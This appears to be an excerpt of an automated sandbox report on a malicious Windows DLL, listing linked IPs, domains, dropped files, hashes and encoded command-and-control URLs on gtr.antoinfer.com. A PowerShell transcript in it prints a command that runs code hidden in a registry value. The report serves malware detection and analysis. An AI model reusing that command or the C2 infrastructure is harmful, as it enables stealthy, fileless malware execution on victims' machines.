                              • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, www.bing.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, ie9comview.vo.msecnd.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, l-0014.l-msedge.net, cs9.wpc.v0cdn.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/444316/sample/3a94.dll

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              16:52:17API Interceptor2x Sleep call for process: rundll32.exe modified
                              16:53:08API Interceptor18x Sleep call for process: powershell.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              165.232.183.493b17.dllGet hashmaliciousBrowse
                              • gtr.antoinfer.com/favicon.ico
                              9b9dc.dllGet hashmaliciousBrowse
                              • gtr.antoinfer.com/favicon.ico

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              resolver1.opendns.comlaka4.dllGet hashmaliciousBrowse
                              • 208.67.222.222
                              o0AX0nKiUn.dllGet hashmaliciousBrowse
                              • 208.67.222.222
                              a.exeGet hashmaliciousBrowse
                              • 208.67.222.222
                              swlsGbeQwT.dllGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-1048628209.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-69564892.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-1813856412.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-1776123548.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-647734423.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-1579869720.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-895003104.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-806281169.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-1747349663.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-1822768538.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-583955381.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-1312908141.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-1612462533.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-1669060840.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-921217151.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              document-1641473761.xlsGet hashmaliciousBrowse
                              • 208.67.222.222
                              gtr.antoinfer.com3b17.dllGet hashmaliciousBrowse
                              • 165.232.183.49
                              9b9dc.dllGet hashmaliciousBrowse
                              • 165.232.183.49

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              ALLEGHENYHEALTHNETWORKUS3b17.dllGet hashmaliciousBrowse
                              • 165.232.183.49
                              9b9dc.dllGet hashmaliciousBrowse
                              • 165.232.183.49
                              sMpor4yDdu.exeGet hashmaliciousBrowse
                              • 165.232.177.150
                              WesYhOA67u.exeGet hashmaliciousBrowse
                              • 165.232.177.148
                              06LzL8skNz.exeGet hashmaliciousBrowse
                              • 165.232.183.193
                              Jt8zMQzDO2.exeGet hashmaliciousBrowse
                              • 165.232.183.193
                              WCPcSoW6ZI.exeGet hashmaliciousBrowse
                              • 165.232.184.56
                              VD4V1nD2qq.exeGet hashmaliciousBrowse
                              • 165.232.184.56
                              PDFXCview.exeGet hashmaliciousBrowse
                              • 165.232.56.100
                              Quote.exeGet hashmaliciousBrowse
                              • 165.232.56.241
                              SyfoFC5d21.exeGet hashmaliciousBrowse
                              • 165.232.110.48
                              RNM56670112.exeGet hashmaliciousBrowse
                              • 165.232.36.60
                              RRUY44091239.exeGet hashmaliciousBrowse
                              • 165.232.36.60
                              http://165.232.53.33/chrgoo/index.htmlGet hashmaliciousBrowse
                              • 165.232.53.33
                              exploit.docGet hashmaliciousBrowse
                              • 165.232.122.138
                              Information_1598546901.docGet hashmaliciousBrowse
                              • 165.232.71.161
                              Important_1598548213.docGet hashmaliciousBrowse
                              • 165.232.71.161
                              Information_1598546966.docGet hashmaliciousBrowse
                              • 165.232.71.161
                              Important_1598548221[540].docGet hashmaliciousBrowse
                              • 165.232.71.161

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{166D0566-DDEC-11EB-90E5-ECF4BB570DC9}.dat
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:Microsoft Word Document
                              Category:dropped
                              Size (bytes):72360
                              Entropy (8bit):2.100864962810027
                              Encrypted:false
                              SSDEEP:192:rFZOZ92JLW/tAflxM6+HKkMN9VfOqhGfiWGzMGWiGrpGeG7xzt:rLa0Jiluo6+AN9tSHmm1m
                              MD5:317F0A36C770F6DE16BF5981B51C5D15
                              SHA1:BF0CE97F5B36315AE8B4D734A42DBD339F96CCA8
                              SHA-256:2D7D550080AD16AF04A5CC5BF68B729F9730371174C7E84FEF8A00F54DF0A695
                              SHA-512:7FFC3FFD628BA208B161BC72F71290971E8E0BAEAC72AAAEB8331773836435BE584C94A8EF4362B5BD6770354E4754D6A3815C88BD4234F455D064EC9F406144
                              Malicious:false
                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{166D0568-DDEC-11EB-90E5-ECF4BB570DC9}.dat
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:Microsoft Word Document
                              Category:dropped
                              Size (bytes):28120
                              Entropy (8bit):1.9095750288955466
                              Encrypted:false
                              SSDEEP:96:r8ZPQ+6kBSIzjR2MqWuMv+lqt/1itCgpr:r8ZPQ+6kkIzjR2MqWuMv+lqR1iZr
                              MD5:5EDD21BA1C8AF437F843240FF522681C
                              SHA1:E8A998A143D74959F8DCBBBE9DBA74B0D4D9D9BC
                              SHA-256:298E60E3FB5ABFA79D5E0DB72F08BA43D6C7982A1FB0B3FF5FF139653F05541C
                              SHA-512:0D85CAB259DE2F5AECFAFEAD469CD4FB8119B846F110E90C4E113B4A3190C918B2B780C6C4A143D00A1D75B4BD3E1BA7178690605EEEA8BE36705639E1E011BA
                              Malicious:false
                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{166D056A-DDEC-11EB-90E5-ECF4BB570DC9}.dat
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:Microsoft Word Document
                              Category:dropped
                              Size (bytes):28172
                              Entropy (8bit):1.9263177932111364
                              Encrypted:false
                              SSDEEP:192:rFZyQd6zkdzjJ2QqWJMw+t3z7cubRl3zwz7cubhYA:rLfI4d/YQpSwa3zwuv3zwzwut7
                              MD5:E90FF1B86959F97D97684E87AB3F7817
                              SHA1:85B587F1F1FA7EE7B82C850D8256BF8E7E215201
                              SHA-256:E051DEEA1BAE06F68B74C780D73E504B2F6696273CDDFF34614E0027C8A8D099
                              SHA-512:CD592CD3E5319397AD3F2D1018295AC8E4EB0A36F20A11270A46BE51E095F98DC6E8F5CA139EC395A1012831332F0E4E7FF72E3D86F37B1557E7CE349E153BA8
                              Malicious:false
                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1D3BDB90-DDEC-11EB-90E5-ECF4BB570DC9}.dat
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:Microsoft Word Document
                              Category:dropped
                              Size (bytes):28140
                              Entropy (8bit):1.9175696715482693
                              Encrypted:false
                              SSDEEP:96:rNZeQu6wBS5zjx2IqWfMB+NhjpdHlhmEsjpTn4A:rNZeQu6wk5zjx2IqWfMB+N1Tlgxn4A
                              MD5:0F48B7FD8CA90F110E8BEF7E4682EBD5
                              SHA1:C8FAA577FB9EF645C505FAB36F4AFDE27EF6561A
                              SHA-256:9409DEC02170C770DD4E0F50A6E4C6AFC146D32BBFA25037A66B8464A79CB687
                              SHA-512:795A4DF8C75FACFD475CE798BA74A09F4DF26C13E8CFBFB36E804E718E6A8384A024992B1F40C633E24AB262620184B1FD2AAA6B22179FB8DBCA9BCB91AADD7C
                              Malicious:false
                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\0DMy[1].htm
                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              File Type:ASCII text, with very long lines, with no line terminators
                              Category:downloaded
                              Size (bytes):2456
                              Entropy (8bit):5.97847634324252
                              Encrypted:false
                              SSDEEP:48:MlibnPXXpF+lCn4XkIonzd8MTpIZMLaxaOwDRiAShsB:AqPXXpv40Ionzd8rWaoOEiB6
                              MD5:CA69CFFD97933BDB9C98DEEDCFF5CF74
                              SHA1:2E5BBAFE5ECFB6CEAF52AD34D42BF1119E9942E9
                              SHA-256:9B3C39A568F5156A5144643614466E11961C83AFF2B4E8CECFEE07954C811556
                              SHA-512:95F9DE72CBC5622CE6F2738793AFF2EAB0F721CEAE0CB5877BFE570EB069243C82F45D45877F8054B8726E7803F4DA7D318B47E9BD683262DBBEA67615407374
                              Malicious:false
                              IE Cache URL:http://gtr.antoinfer.com/TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC5C/QMacbN7bi5gg4i/EPDpjwjNeqvxB8nx8goUN/7UScKdA3erCdyZnr/M1mYt7N44_2BCZB/z_2BQHKBZE3I76X4pk/LLUxigZ_2/FKtPJihoxkrQplteHpxJ/SQ5O5MOBE3EqfyedXsa/WMc6NwZF0braqCo_2FtHND/MeZCuTIpsRPeP/oRY2gUKx/_2BWnIG4Butzcab_2F67iqF/5L_2FfljiF/BmcXquDrczHDDG7sB/8E2Nz3hVUHpI/Iejf3l0Gse2/15LRCzp_2Bw/0DMy
                              Preview: SLi/XPeh1u6GvU7BSTZM11/STOAtQeLTvBcQmBsnmsS8iajpirRApVP204EMFT0sQw21hCUuQ9DNUwGLbb184tRSNVid9wbrC/QkNGH8gokNTTVDKEZ0zHmisTyO8JR8R8wwSlgyL85YTkkO0QLgGAIrEHsJiFoL4aoeXHrvqR8UvsTYQbuWcfLskpX1lQHXP0Lpg1bW5LEgeAtRQVs2n8yf41YIq0qFF1DP2qQUqckBY4bZbHy4o4J68NZ9PeiWrhIii04KhTVy9RIACNzbBdlJCMgAFnMKtQ/5Sgxdl8nJQZfWTjAdm0ALJw6NYIqnpOQ2yIT7/RQCLadoQSHXlFKI9u1FCTKR5VKNdjTjNrR7GeMQZvjxk0LhqZzSfu/lWyj7lPFBRHjCrbJZng+yP5hfnhxT5xFVGJLW3HGVsaU+ro3KfO35L8uUKsWGALoKV+KASAZjjtf/j9PF1YjgogBdVS0u2f5bMjYb7kA6sWxbdMd3M66Kl059rjjbKM2w1mhPglTIHbDXZr20YmdcpaSBfydDsXcla4dUWVyisPFUkDqtprzAuykki0e/yxb/Gby/zN4lhaJXYhOer0NUrOIqnWOyo0EgtOpmpmJQi7vStInudFHizt1lJy0JN4y5aH9n/1BglTso0BxeCNXYKM97OZEqEQhPlNV+7wts7qGb04aA5GFv1YWZ6nCs+GEUr7d5I6itPsYeVXpdx9iI14cajItb/i41oS5ZuVL9IKjwoWLTLWv7xqG7Pjz3SPkgvyAUgqsUggA4NCeJ+UQzP7PFyVr5XIUvhTt2BSrZ7zb4IDIKLzhRNpVbsWMTUMiW+qwAAHiXlnMFBCSgJK/i8WksuzLDKFezKjQ2b4nSO0BvJSYAPH4TEKtWZvDbtnaIoBHHArtax/MjaSJDsizLrjLrsWVPziHl3DbX30GdOFUXBdHylC1lu29sVia3kDQxAdYZ3YHamww4x6NBZJ1Gy+awLV0mNEhRoi3fao5h
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\CJ[1].htm
                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              File Type:ASCII text, with very long lines, with no line terminators
                              Category:downloaded
                              Size (bytes):258240
                              Entropy (8bit):5.999817357934779
                              Encrypted:false
                              SSDEEP:6144:i/d/ybCg2dciObr8mv4iQRV9JGAO/KZpAeXoIXQUkuySb39kC:i/3+UHiQyPKPPgZabtF
                              MD5:DFB6898B5C07756E927BC079F55B7EF7
                              SHA1:4972812015301D42C9E890801EA36BA4C7838AEB
                              SHA-256:46BF96945DD89AD3C83CF46973B6CD50E48C2F7C004443C99A3AE81FA0722AA4
                              SHA-512:F49798EACD58002F08F9056CB5B80D3FFFFCAB40F11914D64285603C0FB0D959898C46881C878D0B3DC8C60E4DBE017AAA50F2F0C9F92F7A216BED8D2D7241CF
                              Malicious:false
                              IE Cache URL:http://gtr.antoinfer.com/OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCeGanwp5x6mxFdtm_/2BQQ_2BZBXUS0UsE/so7pu77WVpSX0kE/e_2FC7i8m9HUadv_2F/jHuYwYKPu/BKlyw96_2B2HnlpmSd5G/KHfN8q_2FZUhddmueVc/VN22bVsSXOc1F2H2TTIYic/FU2T3AQj_2Bf0/Yc7WUnV_/2FNtnojv1lJnCN4_2B2aG1E/ZT_2F8RuAw/TC3tCpega8r1SAjDV/0ZScgJdMygUO/w95b0xrv2QT/DGrWX40QWt0tWT/QGDiJ9RLs/CJ
                              Preview: TE1yNAiDENMvRkfTtJNHHLbRqSBFOVJbFHkoIN2s7erFkjUlkXUXyBVfxuRKFnxMtxog5Y/jGBeFAWDnv3ogB/9zTR9YvGdpEtU/hJDrocOKawBeX1uS22LY+R0xM0eQC4q2AJJyYfWk9hy3WeJqpVJGwO7HC+xp3JXzMXu6tKLHcs70pIQpQH2HITUnXMRDFVHTkX7is16v7QnHj3D62A/1BJ/Qq6gsPzy6gssfMWsv4qOb/VCjukO1qStDzJOeQOWEGSpSD8FLK01KeyzMh7wBWZczkokAMh/CfRddE0ulXSooR/YwH4T2gljzoNoBBG3BKLINZPJhUcizoN4d39B8sYC7c8TOXYFISS52QmUHhlocEqs5tUJi4E7P8XUE7aly8kdF5rtx558GEaBPK7B1CiVwoEBJUWl0uYO3XM4S9sBIesP8nIFRn5Ynz3j8g4KosF7yksd54eit0/GGccGoKD2xUTzXPQKSGTRwT4sRQFiHOJpyX26xJO9xjjYVXPgrqO9mv80padi5MVSiRz3dITExwYCB8uqVJE1W1oiE3eNZRWQxXfa6KQQ5h6ID6mJj2AC5ckHfjvbEfkGyyPd43c7/UjspbfQaJqYovxAEoEQZMVufoxzzMbu00eHTKdgUB6kDlQmucin+Zd4V8nCub6uoKnZ1O5hQQSAJFVezCKRnzyMrP4dTDkPWR6PFeF6cK/sqeav4ugI028IR0rEeUmHtY2a40k5oE4fvxWgojI1DmNJt30uS9jY6+CCiRxrigd6XQ88930CBpSyKpV6T+E1z0hq8vwSEDlgVa9cTsorMAPDi87hHRtVYWF173METchOAUO1RJv/2pK7f6KqsgBEWZPVKwzFF0u6ginmnMnty4Pii4dZOv52gzlh4cFFZKTzoElQ2TMXEtHE43ewu9h/JtYCkbn4vYruwslxvMSiX7YLftg9JFtGq3BdudX3y4WnZx5bECrdrMjsZlsq9nFoz/vz67xG1v9+F
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\_2BFfob[1].htm
                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              File Type:ASCII text, with very long lines, with no line terminators
                              Category:downloaded
                              Size (bytes):328564
                              Entropy (8bit):5.999819521741829
                              Encrypted:false
                              SSDEEP:6144:yZcMvk11XnvwsyToGLCwu0dpjRfCwzVPJAoDaqX7FWy+tpqx2:xMvk11XvwPToGLCQpjRKwJPJba8FW9tZ
                              MD5:D65D2161F47805CD422863ED419644B3
                              SHA1:3AC0BB2B2C0BAFC14E77C3566063BAE0F89019F0
                              SHA-256:8E542AD3CCF2E42E398B6F6CDE96009D2D04EC3FEC657D2914ABAAA089B52DC5
                              SHA-512:71B6E1D8FD7069DC3D87AFED992BB82752F2CA9F5FBCE804BBB31FDBA4FE3D9AF7C21FA1214781077A4399A95714CE322B4A93ACD63F66895B0B3487F532A643
                              Malicious:false
                              IE Cache URL:http://gtr.antoinfer.com/HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrjvBKs_2BWTN1jd/cRVlgWa0o/p1MOk_2BLI89mWlaMirs/Gdw7n3bR8ORjIY_2Fx6/NYz_2BwvSm9u2x0DN_2BOH/Ni1nKLSa9JhBd/ZE9joS5j/ehlmvjX_2FlxlUw7sENHL6w/CDmAOpgIB5/uqJKH_2B5K5P34v5C/Q_2BbSOhpl7C/1na6SsW0l2M/cy_2FPqMdKquM4/T1TrxnsCco2huo0cd5MLY/0H3wDM7jB_2F837m/FO_2FMxSAhLyD6r/IIFbv4aVX2Mk_2FOSl/48WQx68DGUnQj/_2BFfob
                              Preview: IOk2wITIWutwBTqX6ZAe61bXanLtQEDWubij1VIWwM/uDM+FrcJc3uEA2ZKMXaDWh3cC/clqjW44vjhWYONBQHLMgS+wBDBEEGES320E2QDf6Uk7TmYf4/+2JgtJTCbFwSXHFBi/SbgmlzLVTfE2qbh7L0e37AywnjczReasrKb4pvP4DyVgqSvc8vfQh4j690YTbB2XwT3NQbk44zbb3lJmcWpL8c7iy0/BhK/waddVGitduRVhDHBjqkJgKpA4wmxFI8I27V5HfTW1C9EyKWRoPAFBjeMrP/VAPrH8+Tsre5VSejofucIcQoyClWlCro4x4PZvZXxH22z7xybTsSyj00/ElIJX1POFGAxAhqZ6w0IfXn72gatNQgXvNse8alN+xNSOtuZYCDDBbqz4jWyLEe68VODx5zb5h6f/Sxb9abt3JH8WlVI+Vxa+9kwk97hhuJfjO+DDHqJRdWkKbTLjAEks+8yesSASeW9xewu6JuPwhds3LfOsDmJMd0o3yGyphkK7/8s0HwyTATwy9asmo5rBBGBizShQzCJBuss7JUUBYPtifE1hD5Qtp1h+VI9Rdr2porAzIGcNtloSWt4fcCSY18irF8XmPUU6HG8CbxMzz6b6rQAIyjj+rjHfmL7mUviABTF4w8AmXq15vqn1eOrXrKadb5Uu9cgRkXTJRE2YnoN6MYbpWnv8mITNXrQaLByWtkO5y0ajgef6xiaGM5D3cqAgGh+FJixjKeCIdxocmvGoW5qG3HELLD53+QOgxoFp/L6rSnfBPjJrK/KV043BTj4tBRaQSscb21ANC1cfus1LlJMMESN3MEfazIveNdJvKXeSp8jQwk5CZgd1ZIimveqByslSt7o7l1Mzor3coHOTpmuT0LXcDXrnVlRGXb3qCB8OKRh7kh8zk07MKh5Av03wj0U9OmQyBNOdTExh4ZtAiXmUaP2yu/b3sDsdx7fgfRiewn/1CQ+MeIWcM0Vn9woWstQ0f5J/
                              C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):89
                              Entropy (8bit):4.412554678800314
                              Encrypted:false
                              SSDEEP:3:oVXU3KfGLJLFp498JOGXnE3KfGLJLFU7n:o9UaSwqEaSS7
                              MD5:8D36A22121E23FEE0C6FF967FABC7C9F
                              SHA1:6AB24AD3A5B5A1C3297935FD884D16607D338AB2
                              SHA-256:AC2BF550E697374F1FFF169091935EA0395783571E1111A06F56356FEBDAD232
                              SHA-512:BE7BA4CC152B1A7774EDE9D9050BB3B250BCE6202B1B966CACE74069C15302958D9EE38852F7CECA9F231DF6165B172848BA3D13018C3AF525DF850E72E50278
                              Malicious:false
                              Preview: [2021/07/05 16:52:55.597] Latest deploy version: ..[2021/07/05 16:52:55.597] 11.211.2 ..
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ip5c0f02.3tk.ps1
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcbiu1ig.42d.psm1
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\~DF0F558DCEA216EEDD.TMP
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):40153
                              Entropy (8bit):0.6721295915726995
                              Encrypted:false
                              SSDEEP:96:kBqoxKAuvScS+mg6Tgphjpd76hjpdJhjpdq:kBqoxKAuqR+mg6Tgp1f61l12
                              MD5:3B12C53F64AA9AAE48FA99DD462323F8
                              SHA1:CEF166B313DBD447B0308D56BFF0374D73F2597B
                              SHA-256:C2DE96C4F6609F6F923AB649EDF844F622041AEBE946955765ABE8CE01785973
                              SHA-512:089EDD5B67E551892DF6A8217EC6897D32607B525DF21758CF53D6C47EA2FF4289BEC2F7AB1BEF6DCE26A3ED4753D2D30D522496BDC002562AC6A384D3C21A20
                              Malicious:false
                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Temp\~DF3FF9B029E5192D75.TMP
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):13413
                              Entropy (8bit):0.7018055925052197
                              Encrypted:false
                              SSDEEP:24:c9lLh9lLh9lIn9lIn9loV9lo19lWaXY2h2JiB2J+7X+5eD++5:kBqoIeAk6QF5
                              MD5:52553F46F1704934835C4DE6178D3F4F
                              SHA1:43BFB35935B24475E8D4132F993216662BF9DE1E
                              SHA-256:EFBCB3C5FF7742544DE80FD9C5FFC2D1FFF227E66B3369A0BD08EC9B8A19F334
                              SHA-512:3C5C2D89C29F519ADB6CC8E16AD963919A6CF7ADFCE6C8B043D6A39EBEE2931738AE0E0E8F671408A100C7F011ECB5381B563653AD9D783A096CE2028613BE52
                              Malicious:false
                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Temp\~DF6EAF3ABE87705E33.TMP
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):40105
                              Entropy (8bit):0.6629620622757341
                              Encrypted:false
                              SSDEEP:48:kBqoxKAuvScS+CkuHLIL5Rbh6gikRbh6gi3Rbh6giI:kBqoxKAuvScS+CkuH0dqtkqt3qtI
                              MD5:8B952EFE3F14FC91C368F04033DC6004
                              SHA1:12EC1BCB176427B5917FDB39E5FF45D30353AADD
                              SHA-256:72F0393157A67239BE9761E5AD53D75431586E85E49731F12B9E3FB7D426C8C7
                              SHA-512:24C94D2B87B327680B8689869CB28EA35F643E78D267A93D89D2DF7E691E5EF924CEDCA6DD2E9373E2EA1A8F70C8F3F366D437581E1CF68FFA139694F320F077
                              Malicious:false
                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Temp\~DFA1E658E0CB2C92C6.TMP
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):40217
                              Entropy (8bit):0.6834448918036513
                              Encrypted:false
                              SSDEEP:192:kBqoxKAuqR+rl3elc3z7cubL3z7cubU3z7cubx:kBqoxKAuqR+rl3elc3zwuf3zwuA3zwud
                              MD5:A141120014A3CB3DFECBD9C51AE5C4EB
                              SHA1:2E4F94F1A901450679304FAF45771B82E93B199B
                              SHA-256:5642AF0321783222BB59495161A237C5ECD2A5DDAE5BA20B863355949166DC46
                              SHA-512:173B0BBCDB8F135401BBCB3168A1A49CA80FDED3D6C7870584AC49F947B43B1B6F130A99E6BFB535AE4D7F2137D75564112AB98C5E6964600DC8BF92C6363D12
                              Malicious:false
                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\Documents\20210705\PowerShell_transcript.116938.pbWhvSVs.20210705165307.txt
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):978
                              Entropy (8bit):5.470798394117449
                              Encrypted:false
                              SSDEEP:24:BxSAEDvBBSx2DOXUWOLCHGIYBtBCWAHjeTKKjX4CIym1ZJXaOLCHGIYBtBW:BZgv/SoORFeVAqDYB1ZkFeW
                              MD5:9C17BF4AA0CD21F8D4434FBE9C6F00E9
                              SHA1:A1489267FD0728C1392D6A9ACD41AE0DFBE2ACC8
                              SHA-256:1622DCA0170692A643AD3B4CDBED0747FD041A2DED958E5ABB17A9EEF86B7100
                              SHA-512:137F9F29206E2A35C8FE80E05C5ACF6F58FEE1AE0E136212DEABC99A288AA36BE0D009B3F15F1C3610936E2A22D375B3ADFE507EFC886BEEC3DFD2F4707BDDC1
                              Malicious:false
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210705165308..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 116938 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 1384..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210705165308..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..

                              Static File Info

                              General

                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.7442139076304946
                              TrID:
